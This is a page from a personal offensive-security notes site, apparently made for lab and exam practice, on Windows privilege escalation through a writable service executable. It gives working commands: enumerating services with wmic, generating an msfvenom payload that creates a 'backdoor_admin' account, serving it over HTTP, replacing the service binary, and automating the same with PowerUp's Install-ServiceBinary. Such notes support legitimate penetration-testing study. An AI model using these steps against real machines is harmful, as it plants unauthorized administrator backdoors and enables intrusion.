💻
my_offsec_notes
  • Intro
  • Enumeration
    • Network Discovery
      • Arp
      • NetDiscover
      • TCPDump
    • DNS Enumeration
      • Find E-mail Addresses
      • Zone Transfer
    • Scanning
      • Nmap
        • FlaconSpy.py
        • NSE
      • AutoRecon
      • onetwopunch.sh
      • nc
      • Nikto Scan
      • Banner Grabbing
    • brute forcing the web
    • my recon cheat-sheet
      • Comman
    • Passive Enum
  • Starting web services
  • ⚓Common Ports
    • TCP
      • Samba
        • Enumerating
        • Accessing
      • LDap
      • Domain (53)
      • NFS
      • MSRPC (135)
      • SMTP
      • MSRPC
      • FTP
        • BRUTE FORCING
      • KERBEROS (88)
      • POP3
      • RPC-BIND
      • SQL
        • MYSQL
          • My-SQL Root Access
          • Access
        • MS-SQL
          • Access
      • HTTP/HTTPS
        • WEB TECHNOLOGY
          • WORD-PRESS
          • DRUPAL
          • JOOMLA
          • WebDav
          • JENKINS
          • FLASK
          • PHP
          • J-BOSS
        • DIRECTORY/FILES FUZZING
        • LOGIN PAGE
        • TOMCAT
      • ORACLE (1521)
      • SSH
      • RDP (3389)
      • Redis
      • Rsync
      • Netbios (137)
      • Memcached (11211)
      • SSL (443)
      • Finger (79)
      • RPC (1024 to 5000)
    • ALL-ROUNDER
    • UDP
      • SNMP (161)
      • TFTP
  • PORT KNOCKING
  • ENUMERATING USERS
    • ENUM HASHES
  • Exploitation
    • Web Site Exploitation Vectors
      • LFI
        • Config Files
          • Linux
          • Windows
        • Some Useful
      • RFI
      • XXE
      • XSS
      • SQLi
        • NoSQL-Map
        • SQL-Map
      • SSTI
    • Accessing Target Machine
      • Windows
      • Linux
    • Exploits
  • Buffer Overflow
    • useful commands
    • Buffer Overflow Prep ("THM")
  • Creating Reverse Shells
    • Online Resources
    • Windows
    • Linux
    • Mac
    • Gifts for Web Pages
      • Scripting Languages
    • Common One liners
  • Active Directory
    • Enumeration
    • my A.D. Cheat-Sheet
    • After Getting D.C.
  • Priv-Esc
    • Windows
      • whoami /privs
      • Writable Service Executable
      • Cheat sheet
      • Unquoted Service Path
    • Linux
      • Cheat sheet
      • Cronjob
      • Docker (Group)
        • Docker GTFO
      • LXD (Group)
      • sudo+LD_PRELOAD
      • Mysql
        • MySQL (root access)
      • sudo<1.8.28
  • Break-Out Commands
    • Jailed SSH
    • Spawn a Bash shell for me
  • Password Attacks
  • PORT FORWARDING / TUNNELING
  • Post Exploitation
    • injecting Backdoors
  • Machines
    • Template
    • Hack The Box
      • Late
    • Try Hack Me
    • P.G. Grounds
    • Vuln-Hub
Powered by GitBook
On this page
  1. Priv-Esc
  2. Windows

Writable Service Executable

On windows : 
>>> wmic service get name,startname,pathname

If you found the writable vuln service ,then move to thst folder in which it is stored with GUI .
And to confirm make a test.txt file inside that folder..

On Kali : 
>>> msfvenom -p windows/adduser USER=backdoor_admin PASS=piyush -f exe  > service.exe
>>> python3 -m http.server

NOW : 
On windows open browser and visitto your web service and download that payload and replace it with the original one.

open ‘services’ program from start button.
find our vulnerable service..
Right click the service and click on start
<Don't worry about hte error>
open powershell :

>>> net users
<we have our new account>


==========Bonus here : 
If you dont like to fiind service mannualy, use : 

link : https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

transfer it to windows arget machine and run following commands in powershell : 
>>> Import-Module .\PowerUp.ps1
>>> Invoke-AllChecks
>>> Install-ServiceBinary -Name “<vulnerable_service>”
now go and restart the service as guided above .

>>> net users

Previouswhoami /privsNextCheat sheet

Last updated 2 years ago